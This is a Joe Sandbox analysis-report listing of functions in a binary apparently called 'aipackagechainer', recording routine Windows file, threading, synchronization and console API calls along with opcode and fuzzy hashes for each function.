Part of subcall function 00263700: SetFilePointer.KERNEL32(?,00000000,?,00000001,4938EAB5,?,?,?,Function_0008BEE0,000000FF), ref: 00263735
Part of subcall function 00263700: GetLastError.KERNEL32(?,00000000,?,00000001,4938EAB5,?,?,?,Function_0008BEE0,000000FF), ref: 00263742

GetLastError.KERNEL32 ref: 0026AE07

Part of subcall function 002637A0: SetFilePointer.KERNEL32(?,?,?,?,4938EAB5,?,?,?,?,?,Function_0008BEC0,000000FF), ref: 002637DA
Part of subcall function 002637A0: GetLastError.KERNEL32(?,?,?,?,4938EAB5,?,?,?,?,?,Function_0008BEC0,000000FF), ref: 002637E7
Part of subcall function 002637A0: SetLastError.KERNEL32(00000000,?,?,?,?,4938EAB5,?,?,?,?,?,Function_0008BEC0,000000FF), ref: 002637FE

SetEndOfFile.KERNEL32(?), ref: 0026ADB6
GetLastError.KERNEL32 ref: 0026ADC9
SetLastError.KERNEL32(00000000), ref: 0026ADEE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$File$Pointer
String ID:
API String ID: 4162258135-0
Opcode ID: 203458fd38461cbca94d433347237c3152e1cf46a1e392b80361c55aa66686bd
Instruction ID: 4f7bb5dfdd7bcf2316bf7bfa57844ebf68d7ddfb056ca4ac8256188336157e6e
Opcode Fuzzy Hash: 203458fd38461cbca94d433347237c3152e1cf46a1e392b80361c55aa66686bd
Instruction Fuzzy Hash: 38210772310206DB8B20DF25EC44AABB79CEF81365F54412AFD44E7150EA32CCB58EE2

Function 00279200 Relevance: 6.1, APIs: 4, Instructions: 69synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0027922E
GetLastError.KERNEL32 ref: 00279239
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 002792A1
GetLastError.KERNEL32 ref: 002792AB

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$ObjectReleaseSemaphoreSingleWait
String ID:
API String ID: 1636903514-0
Opcode ID: 4c9f1871c46e8695228e900d79f73fdda8861a3a0399b0f869f2485635c90dc5
Instruction ID: 1d0512eb402164760f9c23ccdc3ac9862119b2e38be43bc0cf7358f25b31f4cf
Opcode Fuzzy Hash: 4c9f1871c46e8695228e900d79f73fdda8861a3a0399b0f869f2485635c90dc5
Instruction Fuzzy Hash: 25213832210302ABDB30AF69D884716B7E5AF91320F15CA19E9A9965A3E771DCA0DB50

Function 002239C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,-0000001C,00000000,?,?,00223B8B,?,00000000), ref: 002239E3
HeapAlloc.KERNEL32(00000000,00000000,-0000001C,00000000,?,?,00223B8B,?,00000000), ref: 002239E9

Strings

hD@-, xrefs: 00223A29
length, xrefs: 00223A1B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: hD@-$length
API String ID: 1617791916-560805717
Opcode ID: f66f69a8e30e46d1746f1fd09cd62869dfea72e505f6c3222682c312414ab06b
Instruction ID: 315a37a697c72abce70f641e1bad348a97417d10a0b317b1cd179f0624e3e085
Opcode Fuzzy Hash: f66f69a8e30e46d1746f1fd09cd62869dfea72e505f6c3222682c312414ab06b
Instruction Fuzzy Hash: 0001D8719203126BD30CEF68D842B86BBA9AF84700F40C569F048DB292EB75DA94CBD1

Function 0025D9D0 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,?,0025CD82,?,?,?,?,?,00000003,00000000,4938EAB5,?,?), ref: 0025D9E2
GetLastError.KERNEL32(?,?,0025CD82,?,?,?,?,?,00000003,00000000,4938EAB5,?,?), ref: 0025DA0F
WaitForSingleObject.KERNEL32(?,0000000A,?,?,0025CD82,?,?,?,?,?,00000003,00000000,4938EAB5,?,?), ref: 0025DA45
SetEvent.KERNEL32(?,?,?,0025CD82,?,?,?,?,?,00000003,00000000,4938EAB5,?,?), ref: 0025DA68

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Event$ErrorLastObjectResetSingleWait
String ID:
API String ID: 708712559-0
Opcode ID: e2c6edcd3c6a773e020b96618803bdf3cd5f4b1e1c96ab9ff100f398aa44f1cc
Instruction ID: 02952a9eeedd3ce8958971ec7190e0dda2b34d19387d312530f559d767d2cd6d
Opcode Fuzzy Hash: e2c6edcd3c6a773e020b96618803bdf3cd5f4b1e1c96ab9ff100f398aa44f1cc
Instruction Fuzzy Hash: AF11A331618741CFEB309F25E848B577BD1AF91322F05581EE88387661C770ECA9CB54

Function 00257BC0 Relevance: 6.1, APIs: 4, Instructions: 51threadsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,4938EAB5,?,?,?,Function_0008BEE0,000000FF), ref: 00257BF7
GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008BEE0,000000FF), ref: 00257C11
TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008BEE0,000000FF), ref: 00257C29
CloseHandle.KERNEL32(?,?,?,?,Function_0008BEE0,000000FF), ref: 00257C32

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
String ID:
API String ID: 3774109050-0
Opcode ID: 60690cf6c21addfdf70ede91834afdbb5275da08a363554e5126a274e0b7e815
Instruction ID: e5702c4827c5cad50bbc2927781e6e7ad1fbdb1199a91c1ed2d8dcaaf8774562
Opcode Fuzzy Hash: 60690cf6c21addfdf70ede91834afdbb5275da08a363554e5126a274e0b7e815
Instruction Fuzzy Hash: 5111E971554709DFDB208F14ED09F56B7E8FB09B12F008A2EFC6592690DBB5E824CB54

Function 00257E10 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00257E2D
DestroyWindow.USER32(?), ref: 00257E3A
IsWindow.USER32(?), ref: 00257E94
SendMessageW.USER32(?,00000407,00000000,?), ref: 00257EAD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$DestroyMessageSend
String ID:
API String ID: 746073012-0
Opcode ID: 87092077410b3947afba88550ce8a58d865a25202c7b692532ff1c015c88d8b7
Instruction ID: 35b55354ffce83ee1e5560ea376a231fbb4940801e15fbfd87bcf8f1ba91031b
Opcode Fuzzy Hash: 87092077410b3947afba88550ce8a58d865a25202c7b692532ff1c015c88d8b7
Instruction Fuzzy Hash: FB116630509301AFD760DF18EA49B5BBBE0FF88B01F4049ADF88982260E770ED58CB56

Function 0027A797 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0027A79E
std::_Lockit::_Lockit.LIBCPMT ref: 0027A7A9
std::_Lockit::~_Lockit.LIBCPMT ref: 0027A817

Part of subcall function 0027A8F9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0027A911

std::locale::_Setgloballocale.LIBCPMT ref: 0027A7C4

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 58ba08d4eca0202cf12286ceb2405b59aec808295107a91f2318252b03559d59
Instruction ID: 60066b0e9cf0f30cfd7c09fb32d5575c836e27820254c554738e019b0c041c58
Opcode Fuzzy Hash: 58ba08d4eca0202cf12286ceb2405b59aec808295107a91f2318252b03559d59
Instruction Fuzzy Hash: C701D475A211119BCB05EF20E84957D77B5FFC5320B158009E80957381DF346E62DF93

Function 00279310 Relevance: 6.0, APIs: 4, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 00279342
GetLastError.KERNEL32 ref: 0027934C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00279357
GetLastError.KERNEL32 ref: 00279362

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID:
API String ID: 3600396749-0
Opcode ID: 03764bae7ba44858824e9fa19c86958eda62129218da70e5fa6bd56f973462fd
Instruction ID: 427c18f201215e96918290b6072d2fb28d0a22ddbcafa9f4f6cc25856fc6625a
Opcode Fuzzy Hash: 03764bae7ba44858824e9fa19c86958eda62129218da70e5fa6bd56f973462fd
Instruction Fuzzy Hash: 35017932114303CFD7208F69E4C8B4BBBE4AF95320F15C95DE09A93190C77598919B61

Function 00257C70 Relevance: 6.0, APIs: 4, Instructions: 44threadsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,4938EAB5,?,?,?,Function_0008BEE0,000000FF), ref: 00257CA7
GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008BEE0,000000FF), ref: 00257CC1
TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008BEE0,000000FF), ref: 00257CD9
CloseHandle.KERNEL32(?,?,?,?,Function_0008BEE0,000000FF), ref: 00257CE2

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
String ID:
API String ID: 3774109050-0
Opcode ID: a7c9ae3f9fd65ab5c0c25d5c40f2485b722403e4d8e05b053d1ebec3b4ec642b
Instruction ID: 57b13bfd380d404912eccd1bb9757abcdfa9e4c7deef75727964e77a9eef4807
Opcode Fuzzy Hash: a7c9ae3f9fd65ab5c0c25d5c40f2485b722403e4d8e05b053d1ebec3b4ec642b
Instruction Fuzzy Hash: A001B571544705DFCB208F54ED09B66B7FCFB09712F004A2EEC66926A0DB71AC10CB54

Function 00257D00 Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00047DF0,?,00000000,?), ref: 00257D22
GetLastError.KERNEL32(?,00000000,?), ref: 00257D2F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00257D43
GetExitCodeThread.KERNEL32(?,?,?,00000000,?), ref: 00257D51

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 2732711357-0
Opcode ID: da3b17c9ed033864e367954d1506f2b776c7e568ed878cbf090f7f8ced468751
Instruction ID: acb205994ffc0197a1f4aaf77c191a217818d3969fc1d3203a43058ce3100234
Opcode Fuzzy Hash: da3b17c9ed033864e367954d1506f2b776c7e568ed878cbf090f7f8ced468751
Instruction Fuzzy Hash: 32F03C71148302ABD720DF28EC48F9BBBE8EF45711F058D1AB855D2190DB70E8058B61

Function 00279100 Relevance: 6.0, APIs: 4, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00279125
GetLastError.KERNEL32 ref: 0027912C
SetEvent.KERNEL32(?), ref: 0027913D
GetLastError.KERNEL32 ref: 00279143

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID:
API String ID: 3600396749-0
Opcode ID: 5b9d6f8c6ccc76c77c0cd6bd9bf9a7edecdbe153dfc1c0a089f21abfd74135d5
Instruction ID: 1bbcb505ecf8adec34370e8e8cd27fefeaf5d53f9a5f9a7a788efe3ee9ee2bb8
Opcode Fuzzy Hash: 5b9d6f8c6ccc76c77c0cd6bd9bf9a7edecdbe153dfc1c0a089f21abfd74135d5
Instruction Fuzzy Hash: B4F0AE316143169BC710AF74EC48926B7A4BF5A330B168629E169931A0DB70A861DB54

Function 0029AA42 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00299646,00000000,00000001,00000000,00000000,?,00290152,00000000,00000000,00000000), ref: 0029AA59
GetLastError.KERNEL32(?,00299646,00000000,00000001,00000000,00000000,?,00290152,00000000,00000000,00000000,00000000,00000000,?,002906D9,00000000), ref: 0029AA65

Part of subcall function 0029AA2B: CloseHandle.KERNEL32(FFFFFFFE,0029AA75,?,00299646,00000000,00000001,00000000,00000000,?,00290152,00000000,00000000,00000000,00000000,00000000), ref: 0029AA3B

___initconout.LIBCMT ref: 0029AA75

Part of subcall function 0029A9ED: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0029AA1C,00299633,00000000,?,00290152,00000000,00000000,00000000,00000000), ref: 0029AA00

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00299646,00000000,00000001,00000000,00000000,?,00290152,00000000,00000000,00000000,00000000), ref: 0029AA8A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c577cac2beede39b3cc0c37d16ab730da1751a8804b1d59ec0613cc02874ae74
Instruction ID: 7d0915d903352049f3d4cc293d8ba9c92c3136ac0e0ff5ada818817d0f8bca7b
Opcode Fuzzy Hash: c577cac2beede39b3cc0c37d16ab730da1751a8804b1d59ec0613cc02874ae74
Instruction Fuzzy Hash: F6F01C36512226BBCF622F91ED0CD893F66FB493A0F168010FA0995120DA328C30DBD2

Function 0027C5BF Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0027C55C,00000064), ref: 0027C5E2
LeaveCriticalSection.KERNEL32(002D7FD4,00000000,?,0027C55C,00000064,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5), ref: 0027C5EC
WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,0027C55C,00000064,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5), ref: 0027C5FD
EnterCriticalSection.KERNEL32(002D7FD4,?,0027C55C,00000064,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5), ref: 0027C604

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 361126fe7eaf7a48981377ce468cd73241f49ae033a9feb4e4bef8b46a018e97
Instruction ID: 66b19b1ee703a08de151fe4150516f17aefb170908cbeaf26679c31bb10cb2cc
Opcode Fuzzy Hash: 361126fe7eaf7a48981377ce468cd73241f49ae033a9feb4e4bef8b46a018e97
Instruction Fuzzy Hash: C3E09231919124AFCE211F50FC0CE9D3F1DEB06751B024012F90976A60DB751D218BD1

Function 00294FFD Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON

Download Yara Rule

Strings

p`-, xrefs: 0029502B
p`-, xrefs: 00295310

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID: p`-$p`-
API String ID: 0-455248977
Opcode ID: 212bab068dd098a825d3820a1b913a1a0c6d98d79beca35d6d7a889393103fa2
Instruction ID: 058739b0d34a448b2a647febd00a6b21b33e68be4c59f1d5ad45073c01d9a264
Opcode Fuzzy Hash: 212bab068dd098a825d3820a1b913a1a0c6d98d79beca35d6d7a889393103fa2
Instruction Fuzzy Hash: 17C13376E50205BBDF21DBA8CC82FEE77F8AB08700F144165FA05EB2C2D674E9558B64

Function 00239B80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

SymCleanup.DBGHELP(?,4938EAB5,00000004,00000000,Function_0008B840,000000FF), ref: 00239E0C

Strings

90#, xrefs: 00239BAC, 00239BEA
, xrefs: 00239C13, 00239C35, 00239CC1, 00239CE3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Cleanup
String ID: $90#
API String ID: 99945797-2250855012
Opcode ID: 313afd45434a1dfee28743fa3b52f6f433586e4f454445bd843113142f1413c3
Instruction ID: 9f94a1fe7fb85c6996ebc524b9c45cf1430d809dc02069c9c3610ce99ba68fad
Opcode Fuzzy Hash: 313afd45434a1dfee28743fa3b52f6f433586e4f454445bd843113142f1413c3
Instruction Fuzzy Hash: B281C0B1D20258DFDB04EFA8C845BEDBBB5FF19714F040159E815AB291DBB0AA54CB90

Function 0028871D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002887AD

Strings

pow, xrefs: 00288785, 002887A2

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 84109e6f82242be55fcfb645a90405b7042294157d3e2c8fa3ec2060498328bd
Instruction ID: 2fae1c4a51a3116441f0adcf6959deb398e13fa2898b7e7fb915ad83f9c3104d
Opcode Fuzzy Hash: 84109e6f82242be55fcfb645a90405b7042294157d3e2c8fa3ec2060498328bd
Instruction Fuzzy Hash: 03519C69A36203E6DF117F14DD0136A7BA4DB50701FB08D58E1D9822EAEF748CB8DB46

Function 0024DD20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

URL, xrefs: 0024D946
.url, xrefs: 0024D94C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID: .url$URL
API String ID: 0-2674294872
Opcode ID: 7325406f27b7eb62342528cf967deeb9480edbb005c09577a1f543586f5ab12c
Instruction ID: f7d72dcecce40170ddd7c2d32e5072e29aa2bdf5c48816c68fe5cd5afbbc8b91
Opcode Fuzzy Hash: 7325406f27b7eb62342528cf967deeb9480edbb005c09577a1f543586f5ab12c
Instruction Fuzzy Hash: D7517E71A1060A9FDB14DF68C884B9EBBF5FF48720F158259E825EB291DB31DD50CB90

Function 00216540 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,4938EAB5), ref: 002165E1

Strings

\\?\, xrefs: 002166DA, 00216705
\\?\UNC\, xrefs: 00216606, 00216667

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: e93a1f8f13b6dfec4e89a56cfd19889708444e53ff0e2d5d8104e657845406b6
Instruction ID: b06df27a81eccf28f282f253176caf67d07ad9ea12e90714b56a0d554b69fa57
Opcode Fuzzy Hash: e93a1f8f13b6dfec4e89a56cfd19889708444e53ff0e2d5d8104e657845406b6
Instruction Fuzzy Hash: 6551AF71D202049BDB14DF68D889BAEB7F5FF65304F10861DE80167281DB75A9A8CBA0

Function 002393F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,4938EAB5), ref: 00239442
LeaveCriticalSection.KERNEL32(?,4938EAB5,?,00000000,0029B840,000000FF,?,80004005), ref: 0023959F

Strings

LOG, xrefs: 002394AA

Memory Dump Source

